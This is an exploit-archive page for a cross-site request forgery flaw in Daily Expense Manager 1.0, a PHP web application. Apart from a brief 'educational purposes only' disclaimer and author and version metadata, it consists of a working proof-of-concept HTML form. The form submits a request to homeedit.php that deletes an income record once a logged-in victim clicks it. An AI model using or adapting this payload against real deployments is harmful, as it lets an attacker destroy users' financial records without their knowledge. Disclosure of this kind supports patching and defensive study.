Daily expense manager 1.0 crosssite request forgery (delete income) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-08-08 | Type : webapps | Platform : php
This exploit / vulnerability Daily expense manager 1.0 crosssite request forgery (delete income) is for educational purposes only and if it is used you will do on your own risk!


[+] Code ...

# Exploit Title: Daily Expense Manager - CSRF (Delete Income)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan@gmail.com
# Discovery Date: August 8, 2019
# Vendor Homepage: https://sourceforge.net/projects/daily-expense-manager/
# Tested Version: 1.0
# Tested on: Parrot OS


# PoC:

<html>
<body>
<form action="http://server/homeedit.php?delincome=778" method="post">
<input type="submit" value="Click!" />
</form>
</body>
</html>